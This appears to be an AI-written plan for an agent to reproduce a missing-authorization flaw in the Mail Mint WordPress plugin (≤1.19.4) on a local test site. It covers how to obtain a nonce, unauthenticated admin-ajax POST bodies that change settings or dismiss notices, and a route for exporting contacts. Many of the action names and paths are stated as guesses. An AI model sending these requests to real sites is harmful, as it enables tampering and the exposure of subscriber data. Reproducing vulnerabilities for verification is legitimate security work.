Mail Mint <= 1.19.4 - Missing Authorization

This research plan focuses on identifying and exploiting a missing authorization vulnerability in the Mail Mint plugin (versions <= 1.19.4). The vulnerability allows unauthenticated attackers to trigger actions that should be restricted to administrators.

1. Vulnerability Summary

• Vulnerability: Missing Authorization (Insecure Direct Object Reference / Improper Access Control).
• Plugin: Mail Mint – Email Marketing, Newsletter, Email Automation & WooCommerce Emails (slug: mail-mint).
• Affected Versions: <= 1.19.4.
• Root Cause: The plugin registers AJAX handlers using the wp_ajax_nopriv_ hook for functions that perform sensitive operations (e.g., updating settings, managing contacts, or dismissing notices) without implementing sufficient current_user_can() capability checks within the callback functions.
• Impact: Unauthenticated attackers can modify plugin configurations or metadata (Integrity: Low).

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php.
• Method: POST.
• Action Parameter: Likely prefixed with mimi_ (the internal shorthand for Mail Mint), such as mimi_dismiss_notice, mimi_save_settings, or mimi_update_contact.
• Payload: URL-encoded POST parameters containing the action, a nonce (if required/exposed), and the target data to modify.
• Preconditions: The plugin must be active. For contact-related actions, at least one contact ID must be known or guessed (IDOR).

3. Code Flow (Inferred)

1. Registration: The plugin uses a centralized AJAX dispatcher, likely in src/App/Framework/Ajax/Ajax_Handler.php or includes/Core/Ajax.php.
2. Dispatch: It registers hooks:

   add_action( 'wp_ajax_mimi_some_action', [ $this, 'callback' ] );
   add_action( 'wp_ajax_nopriv_mimi_some_action', [ $this, 'callback' ] ); // Vulnerable if registered here
   

3. Execution: The callback function is invoked.
4. Vulnerability: The callback function performs an operation (e.g., update_option) but only checks for a nonce (which might be public) and fails to verify current_user_can( 'manage_options' ).

4. Nonce Acquisition Strategy

Mail Mint typically localizes its AJAX URL and nonces for use in its frontend and backend scripts.

1. Identify the Script: Look for wp_localize_script calls in the source code. The variable name is often mail_mint_vars or mimi_admin.
2. Trigger Page: Create a page that forces the plugin to load its frontend assets (often used for lead capture forms).
   • Command: wp post create --post_type=page --post_status=publish --post_content='[mail_mint_form id="1"]' (Search for actual shortcodes using grep -r "add_shortcode" .).
3. Extraction:
   • Navigate to the created page.
   • Use browser_eval to extract the nonce:

     window.mail_mint_vars?.nonce || window.mimi_vars?.nonce
     

4. Action Check: Compare the action used in wp_create_nonce (found in source) with the one used in the vulnerable handler. If they use a generic nonce like mimi_nonce, it can be reused across different actions.

5. Exploitation Strategy

The goal is to perform an "unauthorized action." A common and verifiable action in this plugin is dismissing administrative notices or updating non-critical settings.

Target Action: mimi_dismiss_notice (Hypothetical but highly likely)

1. Request Tool: http_request.
2. URL: http://localhost:8080/wp-admin/admin-ajax.php.
3. Headers: Content-Type: application/x-www-form-urlencoded.
4. Body:

   action=mimi_dismiss_notice&notice_id=mail_mint_review_notice&_wpnonce=[EXTRACTED_NONCE]
   

Target Action: mimi_save_settings (Alternative)

1. Body:

   action=mimi_save_settings&settings[email_limit]=9999&_wpnonce=[EXTRACTED_NONCE]
   

6. Test Data Setup

1. Install Mail Mint 1.19.4.
2. Create a subscriber or a custom field to have a target for modification.
3. Determine the available shortcodes:
   grep -rn "add_shortcode" wp-content/plugins/mail-mint/
4. Create a public page with the found shortcode to expose the nonce.

7. Expected Results

• Success: The server returns a 200 OK response, often with a JSON body like {"success":true}.
• Outcome: A specific setting is changed in the database, or a notice is marked as dismissed for all users.

8. Verification Steps

After sending the POST request, verify the state change using WP-CLI:

1. Check Settings:
   wp option get mail_mint_settings
2. Check Notice Status:
   wp option get mail_mint_dismissed_notices (exact option name may vary; search using wp option list --search="*mimi*")
3. Check Contact Metadata:
   wp db query "SELECT * FROM wp_mimi_contacts WHERE id = 1" (Verify if the plugin uses custom tables).

9. Alternative Approaches

• REST API: If AJAX handlers are secure, check REST routes. Search for register_rest_route and look for routes where permission_callback is set to __return_true or is missing.
  • Endpoint: /wp-json/mail-mint/v1/...
• Information Disclosure: If the vulnerability allows "unauthorized actions," check if mimi_get_contacts or mimi_export_contacts is also registered as nopriv. This would upgrade the severity by adding Confidentiality: High.

Identification Commands for the Agent:

# Find all nopriv AJAX actions
grep -r "wp_ajax_nopriv_" wp-content/plugins/mail-mint/

# Find the callback functions associated with those actions
grep -rP "add_action\s*\(\s*['\"]wp_ajax_nopriv_mimi_(\w+)['\"]" wp-content/plugins/mail-mint/

# Check a specific callback (e.g., save_settings) for capability checks
# Replace 'callback_function_name' with the result from the previous grep
grep -A 20 "function callback_function_name" wp-content/plugins/mail-mint/ | grep "current_user_can"